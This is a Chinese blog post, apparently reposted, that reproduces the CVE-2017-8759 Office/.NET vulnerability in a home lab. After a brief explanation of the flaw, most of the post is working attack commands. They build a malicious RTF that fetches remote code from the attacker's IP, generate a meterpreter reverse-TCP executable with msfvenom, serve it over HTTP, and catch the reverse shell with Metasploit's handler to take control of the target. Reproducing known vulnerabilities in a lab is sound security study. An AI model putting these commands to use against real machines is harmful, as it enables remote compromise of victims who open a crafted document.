CVE-2017-8759 复现


漏洞成因:近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞(CVE-2017-0199)如出一辙,不同的是,这次黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,而整个漏洞的罪魁祸首竞是.NET    Framework一个换行符处理失误。(出自: 一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警



利用文件:这里我直接利用的github上一个大牛的POC,里面详细介绍了用法。






环境搭建:靶机:windows 7     ip:172.16.9.53   

                  攻击机:kali linux    ip:172.16.9.110



利用过程
1.首先获取github上的POC。   



2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件invoice.rtf。
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://172.16.9.110/logo.txt   

3.利用msfVENOM生成一个反弹shell的exe文件,并命名为shell.exe。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.9.110 LPORT=4444 -f exe > /root/shell.exe

4.我们需要监听来自ppsx文件执行之后反弹的shell。
pythoncve-2017-8759_toolkit.py -M exp -e http://172.16.9.110/shell.exe -l/root/shell.exe
5.开启metasploit的监听模块exploit/multi/handler进行监听。
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 172.16.9.110; run"


6.把恶意rtf文件发送到win7靶机上,当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,进入meterpreter,即可获取靶机控制权。



至此复现成功,感谢大家的阅读!!!

原文地址:https://bbs.ichunqiu.com/thread-27342-1-1.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值